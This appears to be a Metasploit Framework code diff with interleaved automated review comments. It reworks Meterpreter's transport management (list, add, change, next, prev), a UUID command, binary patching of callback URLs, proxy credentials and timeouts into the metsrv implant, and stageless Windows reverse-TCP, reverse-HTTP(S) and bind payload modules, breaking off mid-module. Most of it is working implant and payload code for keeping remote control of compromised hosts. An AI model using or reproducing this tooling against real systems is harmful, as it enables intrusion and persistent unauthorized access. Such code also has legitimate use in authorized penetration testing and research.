def self.patch_transport!(blob, ssl)
str = ssl ? "METERPRETER_TRANSPORT_HTTPS\x00" : "METERPRETER_TRANSPORT_HTTP\x00"
patch_string!(blob, "METERPRETER_TRANSPORT_SSL", str)
end
#
# Replace the URL
#
def self.patch_url!(blob, url)
unless patch_string!(blob, "https://#{'X' * 512}", url)
# If the patching failed this could mean that we are somehow
# working with outdated binaries, so try to patch with the
# old stuff.
patch_string!(blob, "https://#{'X' * 256}", url)
end
end
#
# Replace the timeout data with the actual timeout values.
#
def self.patch_timeouts!(blob, opts)
i = blob.index("METERP_TIMEOUTS\x00")
if i
data = [opts[:expiration].to_i, opts[:comm_timeout].to_i,
opts[:retry_total].to_i, opts[:retry_wait].to_i].pack("VVVV")
blob[i, data.length] = data
end
end
#
# Replace the user agent string with our option
#
def self.patch_ua!(blob, ua)
patch_string!(blob, "METERPRETER_UA\x00", ua[0,255] + "\x00")
end
#
# Activate a custom proxy
#
def self.patch_proxy!(blob, proxyhost, proxyport, proxy_type)
if proxyhost && proxyhost.to_s != ""
proxyhost = proxyhost.to_s
proxyport = proxyport.to_s || "8080"
proxyinfo = proxyhost + ":" + proxyport
if proxyport == "80"
proxyinfo = proxyhost
end
if proxy_type.to_s.upcase == 'HTTP'
proxyinfo = 'http://' + proxyinfo
else #socks
proxyinfo = 'socks=' + proxyinfo
end
proxyinfo << "\x00"
patch_string!(blob, "METERPRETER_PROXY#{"\x00" * 10}", proxyinfo)
end
end
#
# Proxy authentification
#
def self.patch_proxy_auth!(blob, proxy_username, proxy_password, proxy_type)
return if proxy_type.nil? || proxy_type.upcase == 'SOCKS'
if proxy_username && !proxy_username.empty?
unless patch_string!(blob, "METERPRETER_USERNAME_PROXY#{"\x00" * 10}",
proxy_username + "\x00")
raise ArgumentError, "Unable to patch Proxy Username"
end
end
if proxy_password && !proxy_password.empty?
unless patch_string!(blob, "METERPRETER_PASSWORD_PROXY#{"\x00" * 10}",
proxy_password + "\x00")
raise ArgumentError, "Unable to patch Proxy Password"
end
end
end
#
# Patch the ssl cert hash
#
def self.patch_ssl_check!(blob, ssl_cert_hash)
# SSL cert location is an ASCII string, so no need for
# WCHAR support
if ssl_cert_hash
i = blob.index("METERPRETER_SSL_CERT_HASH\x00")
if i
blob[i, ssl_cert_hash.length] = ssl_cert_hash
end
end
end
#
# Patch options into metsrv for reverse HTTP payloads
#
def self.patch_passive_service!(blob, opts)
patch_transport!(blob, opts[:ssl])
patch_url!(blob, opts[:url])
patch_timeouts!(blob, opts)
patch_ua!(blob, opts[:ua])
patch_ssl_check!(blob, opts[:ssl_cert_hash])
patch_proxy!(blob,
opts[:proxy_host],
opts[:proxy_port],
opts[:proxy_type]
)
patch_proxy_auth!(blob,
opts[:proxy_user],
opts[:proxy_pass],
opts[:proxy_type]
)
end
#
# Patch an ASCII value in the given payload. If not found, try WCHAR instead.
#
def self.patch_string!(blob, search, replacement)
result = false
i = blob.index(search)
if i
blob[i, replacement.length] = replacement
result = true
else
i = blob.index(wchar(search))
if i
r = wchar(replacement)
blob[i, r.length] = r
result = true
end
end
result
end
private
#
# Convert the given ASCII string into a WCHAR string (dumb, but works)
#
def self.wchar(str)
str.to_s.unpack("C*").pack("v*")
end
end
end
end
end


@ -8,9 +8,6 @@ require 'rex/post/meterpreter/client'
# argument for moving the meterpreter client into the Msf namespace.
require 'msf/core/payload/windows'
# Provides methods to patch options into the metsrv stager.
require 'rex/payloads/meterpreter/patch'
# URI uuid and checksum stuff
require 'msf/core/payload/uuid'
require 'rex/payloads/meterpreter/uri_checksum'
@ -100,6 +97,32 @@ class ClientCore < Extension
commands
end
def transport_list
request = Packet.create_request('core_transport_list')
response = client.send_request(request)
result = {
:session_exp => response.get_tlv_value(TLV_TYPE_TRANS_SESSION_EXP),
:transports => []
}
response.each(TLV_TYPE_TRANS_GROUP) { |t|
result[:transports] << {
:url => t.get_tlv_value(TLV_TYPE_TRANS_URL),
:comm_timeout => t.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT),
:retry_total => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL),
:retry_wait => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT),
:ua => t.get_tlv_value(TLV_TYPE_TRANS_UA),
:proxy_host => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_HOST),
:proxy_user => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_USER),
:proxy_pass => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_PASS),
:cert_hash => t.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH)
}
}
result
end
def set_transport_timeouts(opts={})
request = Packet.create_request('core_transport_set_timeouts')
@ -273,6 +296,18 @@ class ClientCore < Extension
return true
end
def uuid(timeout=nil)
request = Packet.create_request('core_uuid')
args = [ request ]
args << timeout if timeout
response = client.send_request(*args)
id = response.get_tlv_value(TLV_TYPE_UUID)
return Msf::Payload::UUID.new({:raw => id})
end
def machine_id(timeout=nil)
request = Packet.create_request('core_machine_id')
@ -285,83 +320,34 @@ class ClientCore < Extension
return Rex::Text.md5(mid)
end
def transport_add(opts={})
request = transport_prepare_request('core_transport_add', opts)
return false unless request
client.send_request(request)
return true
end
def transport_change(opts={})
request = transport_prepare_request('core_transport_change', opts)
unless valid_transport?(opts[:transport]) && opts[:lport]
return false
end
return false unless request
if opts[:transport].starts_with?('reverse')
return false unless opts[:lhost]
else
# Bind shouldn't have lhost set
opts[:lhost] = nil
end
client.send_request(request)
transport = VALID_TRANSPORTS[opts[:transport]]
return true
end
request = Packet.create_request('core_transport_change')
scheme = opts[:transport].split('_')[1]
url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"
if opts[:comm_timeout]
request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, opts[:comm_timeout])
end
if opts[:session_exp]
request.add_tlv(TLV_TYPE_TRANS_SESSION_EXP, opts[:session_exp])
end
if opts[:retry_total]
request.add_tlv(TLV_TYPE_TRANS_RETRY_TOTAL, opts[:retry_total])
end
if opts[:retry_wait]
request.add_tlv(TLV_TYPE_TRANS_RETRY_WAIT, opts[:retry_wait])
end
# do more magic work for http(s) payloads
unless opts[:transport].ends_with?('tcp')
sum = uri_checksum_lookup(:connect)
uuid = client.payload_uuid
unless uuid
arch, plat = client.platform.split('/')
uuid = Msf::Payload::UUID.new({
arch: arch,
platform: plat.starts_with?('win') ? 'windows' : plat
})
end
url << generate_uri_uuid(sum, uuid) + '/'
# TODO: randomise if not specified?
opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua])
if transport == METERPRETER_TRANSPORT_HTTPS && opts[:cert]
hash = Rex::Parser::X509Certificate.get_cert_file_hash(opts[:cert])
request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
end
if opts[:proxy_host] && opts[:proxy_port]
prefix = 'http://'
prefix = 'socks=' if opts[:proxy_type] == 'socks'
proxy = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
request.add_tlv(TLV_TYPE_TRANS_PROXY_INFO, proxy)
if opts[:proxy_user]
request.add_tlv(TLV_TYPE_TRANS_PROXY_USER, opts[:proxy_user])
end
if opts[:proxy_pass]
request.add_tlv(TLV_TYPE_TRANS_PROXY_PASS, opts[:proxy_pass])
end
end
end
request.add_tlv(TLV_TYPE_TRANS_TYPE, transport)
request.add_tlv(TLV_TYPE_TRANS_URL, url)
def transport_next
request = Packet.create_request('core_transport_next')
client.send_request(request)
return true
end
def transport_prev
request = Packet.create_request('core_transport_prev')
client.send_request(request)
return true
end
@ -599,11 +585,87 @@ class ClientCore < Extension
# Indicates if the given transport is a valid transport option.
#
def valid_transport?(transport)
VALID_TRANSPORTS.has_key?(transport.downcase)
if transport
VALID_TRANSPORTS.has_key?(transport.downcase)
else
false
end
end
private
def transport_prepare_request(method, opts={})
unless valid_transport?(opts[:transport]) && opts[:lport]
return nil
end
if opts[:transport].starts_with?('reverse')
return false unless opts[:lhost]
else
# Bind shouldn't have lhost set
opts[:lhost] = nil
end
transport = VALID_TRANSPORTS[opts[:transport]]
request = Packet.create_request(method)
scheme = opts[:transport].split('_')[1]
url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"
if opts[:comm_timeout]
request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, opts[:comm_timeout])
end
if opts[:session_exp]
request.add_tlv(TLV_TYPE_TRANS_SESSION_EXP, opts[:session_exp])
end
if opts[:retry_total]
request.add_tlv(TLV_TYPE_TRANS_RETRY_TOTAL, opts[:retry_total])
end
if opts[:retry_wait]
request.add_tlv(TLV_TYPE_TRANS_RETRY_WAIT, opts[:retry_wait])
end
# do more magic work for http(s) payloads
unless opts[:transport].ends_with?('tcp')
sum = uri_checksum_lookup(:connect)
url << generate_uri_uuid(sum, opts[:uuid]) + '/'
# TODO: randomise if not specified?
opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua])
if transport == METERPRETER_TRANSPORT_HTTPS && opts[:cert]
hash = Rex::Parser::X509Certificate.get_cert_file_hash(opts[:cert])
request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
end
if opts[:proxy_host] && opts[:proxy_port]
prefix = 'http://'
prefix = 'socks=' if opts[:proxy_type] == 'socks'
proxy = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
request.add_tlv(TLV_TYPE_TRANS_PROXY_HOST, proxy)
if opts[:proxy_user]
request.add_tlv(TLV_TYPE_TRANS_PROXY_USER, opts[:proxy_user])
end
if opts[:proxy_pass]
request.add_tlv(TLV_TYPE_TRANS_PROXY_PASS, opts[:proxy_pass])
end
end
end
request.add_tlv(TLV_TYPE_TRANS_TYPE, transport)
request.add_tlv(TLV_TYPE_TRANS_URL, url)
return request
end
def generate_payload_stub(process)
case client.platform
when /win/i
@ -623,11 +685,9 @@ class ClientCore < Extension
# Include the appropriate reflective dll injection module for the target process architecture...
if process['arch'] == ARCH_X86
c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
binary_suffix = "x86.dll"
c.include( ::Msf::Payload::Windows::MeterpreterLoader )
elsif process['arch'] == ARCH_X86_64
c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
binary_suffix = "x64.dll"
c.include( ::Msf::Payload::Windows::MeterpreterLoader_x64 )
else
raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
end
@ -635,37 +695,7 @@ class ClientCore < Extension
# Create the migrate stager
migrate_stager = c.new()
dll = MetasploitPayloads.meterpreter_path('metsrv', binary_suffix)
if dll.nil?
raise RuntimeError, "metsrv.#{binary_suffix} not found", caller
end
migrate_stager.datastore['DLL'] = dll
# Pass the timeout information to the RDI loader so that it correctly
# patches the timeouts into the binary.
migrate_stager.datastore['SessionExpirationTimeout'] = self.client.expiration
migrate_stager.datastore['SessionCommunicationTimeout'] = self.client.comm_timeout
migrate_stager.datastore['SessionRetryTotal'] = self.client.retry_total
migrate_stager.datastore['SessionRetryWait'] = self.client.retry_wait
blob = migrate_stager.stage_payload
if client.passive_service
# Patch options into metsrv for reverse HTTP payloads.
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(blob,
:ssl => client.ssl,
:url => self.client.url,
:expiration => self.client.expiration,
:comm_timeout => self.client.comm_timeout,
:retry_total => self.client.retry_total,
:retry_wait => self.client.retry_wait,
:ua => client.exploit_datastore['MeterpreterUserAgent'],
:proxy_host => client.exploit_datastore['PayloadProxyHost'],
:proxy_port => client.exploit_datastore['PayloadProxyPort'],
:proxy_type => client.exploit_datastore['PayloadProxyType'],
:proxy_user => client.exploit_datastore['PayloadProxyUser'],
:proxy_pass => client.exploit_datastore['PayloadProxyPass'])
end
blob = migrate_stager.stage_meterpreter
blob
end
@ -673,12 +703,6 @@ class ClientCore < Extension
def generate_linux_stub
blob = MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
Rex::Payloads::Meterpreter::Patch.patch_timeouts!(blob,
:expiration => self.client.expiration,
:comm_timeout => self.client.comm_timeout,
:retry_total => self.client.retry_total,
:retry_wait => self.client.retry_wait)
blob
end


@ -94,13 +94,15 @@ TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_INFO = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_STRING | 461
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
@ -199,12 +201,13 @@ class Tlv
when TLV_TYPE_TRANS_COMM_TIMEOUT; "TRANS-COMM-TIMEOUT"
when TLV_TYPE_TRANS_SESSION_EXP; "TRANS-SESSION-EXP"
when TLV_TYPE_TRANS_CERT_HASH; "TRANS-CERT-HASH"
when TLV_TYPE_TRANS_PROXY_INFO; "TRANS-PROXY-INFO"
when TLV_TYPE_TRANS_PROXY_HOST; "TRANS-PROXY-HOST"
when TLV_TYPE_TRANS_PROXY_USER; "TRANS-PROXY-USER"
when TLV_TYPE_TRANS_PROXY_PASS; "TRANS-PROXY-PASS"
when TLV_TYPE_TRANS_RETRY_TOTAL; "TRANS-RETRY-TOTAL"
when TLV_TYPE_TRANS_RETRY_WAIT; "TRANS-RETRY-WAIT"
when TLV_TYPE_MACHINE_ID; "MACHINE-ID"
when TLV_TYPE_UUID; "UUID"
#when Extensions::Stdapi::TLV_TYPE_NETWORK_INTERFACE; 'network-interface'
#when Extensions::Stdapi::TLV_TYPE_IP; 'ip-address'


@ -77,7 +77,12 @@ class Console::CommandDispatcher::Core
end
if client.platform =~ /win/ || client.platform =~ /linux/
# Migration only supported on windows and linux
c["migrate"] = "Migrate the server to another process"
# UUID functionality isn't yet available on other platforms
c["uuid"] = "Get the UUID for the current session",
# Yet to implement transport hopping for other meterpreters.
# Works for posix and native windows though.
c["transport"] = "Change the current transport mechanism"
@ -280,10 +285,6 @@ class Console::CommandDispatcher::Core
# Disconnects the session
#
def cmd_detach(*args)
if not client.passive_service
print_error("Detach is only possible for non-stream sessions (http/https)")
return
end
client.shutdown_passive_dispatcher
shell.stop
end
@ -382,17 +383,34 @@ class Console::CommandDispatcher::Core
end
def print_timeouts(timeouts)
print_line("Session Expiry : @ #{(Time.now + timeouts[:session_exp]).strftime('%Y-%m-%d %H:%M:%S')}")
print_line("Comm Timeout : #{timeouts[:comm_timeout]} seconds")
print_line("Retry Total Time: #{timeouts[:retry_total]} seconds")
print_line("Retry Wait Time : #{timeouts[:retry_wait]} seconds")
if timeouts[:session_exp]
print_line("Session Expiry : @ #{(Time.now + timeouts[:session_exp]).strftime('%Y-%m-%d %H:%M:%S')}")
end
if timeouts[:comm_timeout]
print_line("Comm Timeout : #{timeouts[:comm_timeout]} seconds")
end
if timeouts[:retry_total]
print_line("Retry Total Time: #{timeouts[:retry_total]} seconds")
end
if timeouts[:retry_wait]
print_line("Retry Wait Time : #{timeouts[:retry_wait]} seconds")
end
end
#
# Get the machine ID of the target
#
def cmd_machine_id(*args)
print_good("Machine ID: #{client.core.machine_id}")
client.machine_id = client.core.machine_id unless client.machine_id
print_good("Machine ID: #{client.machine_id}")
end
#
# Get the machine ID of the target
#
def cmd_uuid(*args)
client.payload_uuid = client.core.uuid unless client.payload_uuid
print_good("UUID: #{client.payload_uuid}")
end
#
@ -494,20 +512,25 @@ class Console::CommandDispatcher::Core
'-ex' => [ true, 'Expiration timout (seconds) (default: same as current session)' ],
'-rt' => [ true, 'Retry total time (seconds) (default: same as current session)' ],
'-rw' => [ true, 'Retry wait time (seconds) (default: same as current session)' ],
'-v' => [ false, 'Show the verbose format of the transport list' ],
'-h' => [ false, 'Help menu' ])
#
# Display help for transport switching
# Display help for transport management.
#
def cmd_transport_help
print_line('Usage: transport [options]')
print_line('Usage: transport <list|change|add|next|prev> [options]')
print_line
print_line('Change the current Meterpreter transport mechanism')
print_line(' list: list the currently active transports.')
print_line(' add: add a new transport to the transport list.')
print_line(' change: same as add, but changes directly to the added entry.')
print_line(' next: jump to the next transport in the list (no options).')
print_line(' prev: jump to the previous transport in the list (no options).')
print_line(@@transport_opts.usage)
end
#
# Change the current transport setings.
# Manage transports
#
def cmd_transport(*args)
if ( args.length == 0 or args.include?("-h") )
@ -515,7 +538,14 @@ class Console::CommandDispatcher::Core
return
end
command = args.shift
unless ['list', 'add', 'change', 'prev', 'next'].include?(command)
cmd_transport_help
return
end
opts = {
:uuid => client.payload_uuid,
:transport => nil,
:lhost => nil,
:lport => nil,
@ -529,9 +559,11 @@ class Console::CommandDispatcher::Core
:session_exp => nil,
:retry_total => nil,
:retry_wait => nil,
:cert => nil
:cert => nil,
:verbose => false
}
valid = true
@@transport_opts.parse(args) do |opt, idx, val|
case opt
when '-c'
@ -560,21 +592,104 @@ class Console::CommandDispatcher::Core
opts[:lport] = val.to_i if val
when '-l'
opts[:lhost] = val
when '-v'
opts[:verbose] = true
when '-t'
unless client.core.valid_transport?(val)
cmd_transport_help
return
end
opts[:transport] = val
else
valid = false
end
end
print_status("Swapping transport ...")
if client.core.transport_change(opts)
client.shutdown_passive_dispatcher
shell.stop
else
print_error("Failed to switch transport, please check the parameters")
unless valid
cmd_transport_help
return
end
case command
when 'list'
result = client.core.transport_list
# this will output the session timeout first
print_timeouts(result)
columns =[
'Curr',
'URL',
'Comms T/O',
'Retry Total',
'Retry Wait'
]
if opts[:verbose]
columns << 'User Agent'
columns << 'Proxy Host'
columns << 'Proxy User'
columns << 'Proxy Pass'
columns << 'Cert Hash'
end
# next draw up a table of transport entries
tbl = Rex::Ui::Text::Table.new(
'Indent' => 4,
'Columns' => columns)
first = true
result[:transports].each do |t|
entry = [ first ? '*' : '', t[:url], t[:comm_timeout],
t[:retry_total], t[:retry_wait] ]
first = false
if opts[:verbose]
entry << t[:ua]
entry << t[:proxy_host]
entry << t[:proxy_user]
entry << t[:proxy_pass]
entry << (t[:cert_hash] || '').unpack("H*")[0]
end
tbl << entry
end
print("\n" + tbl.to_s + "\n")
when 'next'
print_status("Changing to next transport ...")
if client.core.transport_next
print_good("Successfully changed to the next transport, killing current session.")
client.shutdown_passive_dispatcher
shell.stop
else
print_error("Failed to change transport, please check the parameters")
end
when 'prev'
print_status("Changing to previous transport ...")
if client.core.transport_prev
print_good("Successfully changed to the previous transport, killing current session.")
client.shutdown_passive_dispatcher
shell.stop
else
print_error("Failed to change transport, please check the parameters")
end
when 'change'
print_status("Changing to new transport ...")
if client.core.transport_change(opts)
print_good("Successfully added #{opts[:transport]} transport, killing current session.")
client.shutdown_passive_dispatcher
shell.stop
else
print_error("Failed to change transport, please check the parameters")
end
when 'add'
print_status("Adding new transport ...")
if client.core.transport_add(opts)
print_good("Successfully added #{opts[:transport]} transport.")
else
print_error("Failed to add transport, please check the parameters")
end
end
end
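Review bot: The trailing comma on `c["uuid"] = "Get the UUID for the current session",` (the new line after the `migrate` entry) makes the parser treat the following `c["transport"] = ...` statement as the second element of a multiple assignment, so `c["uuid"]` is stored as a two-element array rather than a string; drop the comma. The header comment above `cmd_uuid` repeats "Get the machine ID of the target" from the method above it and should read `# Get the UUID of the current session`. In the verbose `transport list` table the `Proxy Pass` column writes the configured proxy credential to the console in clear text, and hence into any session log; consider masking it or gating it behind its own flag. The enclosing class continues outside this section.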


@ -64,7 +64,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model', '~> 1.0'
# Needed for Meterpreter on Windows, soon others.
spec.add_runtime_dependency 'metasploit-payloads', '0.0.3'
spec.add_runtime_dependency 'metasploit-payloads', '0.0.5'
# Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack'
# Needed by anemone crawler


@ -4,6 +4,7 @@
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/powershell'
require 'msf/core/payload/windows/powershell'
require 'msf/core/handler/bind_tcp'
@ -20,13 +21,11 @@ module Metasploit3
super(merge_info(info,
'Name' => 'Windows Interactive Powershell Session, Bind TCP',
'Description' => 'Interacts with a powershell session on an established socket connection',
'Author' =>
[
'Author' => [
'Ben Turner', # benpturner
'Dave Hardy' # davehardy20
],
'References' =>
[
'References' => [
['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
],
'License' => MSF_LICENSE,
@ -35,14 +34,9 @@ module Metasploit3
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::PowerShell,
'RequiredCmd' => 'generic',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
'Payload' => { 'Payload' => '' }
))
register_options(
[
register_options( [
OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
], self.class)
end
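Review bot: `require 'msf/core/handler/bind_tcp'` appears twice in the header after this change, once as what looks like the newly inserted line directly after `require 'msf/core'` and again after the powershell requires; `require` is idempotent so nothing breaks, but one of the two lines should be removed. The remaining edits in this section are formatting only.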


@ -4,16 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/bind_tcp'
require 'msf/core/payload/windows/stageless_meterpreter'
require 'msf/core/payload/windows/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x86_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 883358
include Msf::Payload::Windows::StagelessMeterpreter
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -35,9 +40,32 @@ module Metasploit4
end
def generate
# blank LHOST indicates bind payload
url = "tcp://:#{datastore['LPORT']}"
generate_stageless_x86(url)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X86
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_bind_tcp(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end
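Review bot: `generate_config` is repeated essentially verbatim in every other stageless Meterpreter module touched by this commit (the x86 and x64 bind_tcp, reverse_tcp, reverse_ipv6_tcp, reverse_http and reverse_https singles), differing only in the `arch:` value and the `transport_config_*` call; that is ten copies of the same twenty lines to keep in sync, and it would be better hoisted into the shared loader or `TransportConfig` mixin with each module supplying only its arch and transport. On the body itself, `(datastore['EXTENSIONS'] || '').split(',')` keeps surrounding whitespace, so `stdapi, priv` yields `" priv"`; `.split(',').map(&:strip).reject(&:empty?)` is safer. I also cannot see a `register_options` entry for `EXTENSIONS` in this module, whereas the reverse_http/https modules add one explicitly; unless a mixin registers it the option is unset and undiscoverable here, so please confirm. `initialize` and the rest of the class are outside this hunk.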


@ -4,18 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_http'
require 'msf/core/handler/reverse_http/stageless'
require 'msf/core/payload/windows/stageless_meterpreter'
require 'msf/core/payload/windows/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x86_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 884402
include Msf::Payload::Windows::StagelessMeterpreter
include Msf::Handler::ReverseHttp::Stageless
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -31,17 +34,38 @@ module Metasploit4
'Session' => Msf::Sessions::Meterpreter_x86_Win
))
initialize_stageless
register_options([
OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
], self.class)
end
def generate
# generate a stageless payload using the x86 version of
# the stageless generator
opts = {
:ssl => false,
:generator => method(:generate_stageless_x86)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X86
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_http(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
generate_stageless(opts)
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end


@ -4,18 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_https'
require 'msf/core/handler/reverse_http/stageless'
require 'msf/core/payload/windows/stageless_meterpreter'
require 'msf/core/payload/windows/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x86_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 884402
include Msf::Payload::Windows::StagelessMeterpreter
include Msf::Handler::ReverseHttp::Stageless
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -31,17 +34,37 @@ module Metasploit4
'Session' => Msf::Sessions::Meterpreter_x86_Win
))
initialize_stageless
register_options([
OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
], self.class)
end
def generate
# generate a stageless payload using the x86 version of
# the stageless generator
opts = {
:ssl => true,
:generator => method(:generate_stageless_x86)
}
generate_stageless(opts)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X86
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_https(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end


@ -4,16 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/stageless_meterpreter'
require 'msf/core/payload/windows/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x86_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 883358
include Msf::Payload::Windows::StagelessMeterpreter
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -36,8 +41,32 @@ module Metasploit4
end
def generate
url = "tcp6://#{datastore['LHOST']}:#{datastore['LPORT']}?#{datastore['SCOPEID']}"
generate_stageless_x86(url)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X86
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_ipv6_tcp(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end


@ -4,16 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/stageless_meterpreter'
require 'msf/core/payload/windows/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x86_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit3
CachedSize = :dynamic
CachedSize = 883358
include Msf::Payload::Windows::StagelessMeterpreter
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -35,8 +40,32 @@ module Metasploit3
end
def generate
url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
generate_stageless_x86(url)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X86
)
end
# create the configuration block, which for staged connections is really simple.
config_opts = {
arch: opts[:uuid].arch,
